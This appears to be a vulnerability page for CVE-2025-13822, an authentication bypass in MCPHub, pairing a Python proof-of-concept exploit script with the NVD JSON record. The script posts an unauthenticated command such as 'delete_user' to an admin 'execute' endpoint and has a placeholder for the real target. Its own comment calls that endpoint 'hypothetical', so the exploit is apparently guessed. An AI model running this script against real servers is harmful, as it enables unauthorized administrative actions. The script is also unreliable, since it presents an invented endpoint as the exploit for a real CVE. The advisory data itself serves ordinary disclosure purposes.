CVE-2025-13822

import requests # CVE-2025-13822 PoC: Authentication Bypass in MCPHub < 0.11.0 # Description: Exploits unprotected endpoints to perform actions as an authenticated user. def exploit(target_url, command): # Example endpoint that might be vulnerable (hypothetical) vulnerable_endpoint = f"{target_url}/api/v1/admin/execute" headers = { "User-Agent": "CVE-2025-13822-Scanner", "Content-Type": "application/json" } payload = { "cmd": command } try: # Send request without authentication headers response = requests.post(vulnerable_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Authentication bypassed.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target cmd = "delete_user" # Replace with actual command exploit(target, cmd)

{"cve": {"id": "CVE-2025-13822", "sourceIdentifier": "[email protected]", "published": "2026-04-14T11:16:24.300", "lastModified": "2026-05-01T15:44:18.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MCPHub in versions below 0.11.0 is vulnerable to authentication bypass. Some endpoints are not protected by authentication middleware, allowing an unauthenticated attacker to perform actions in the name of other users and using their privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcphubx:mcphub:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.0", "matchCriteriaId": "33BFD4B2-E479-4C3C-B70E-4CF84EA4BD6E"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/04/CVE-2025-13822", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/samanhappy/mcphub", "source": "[email protected]", "tags": ["Product"]}]}}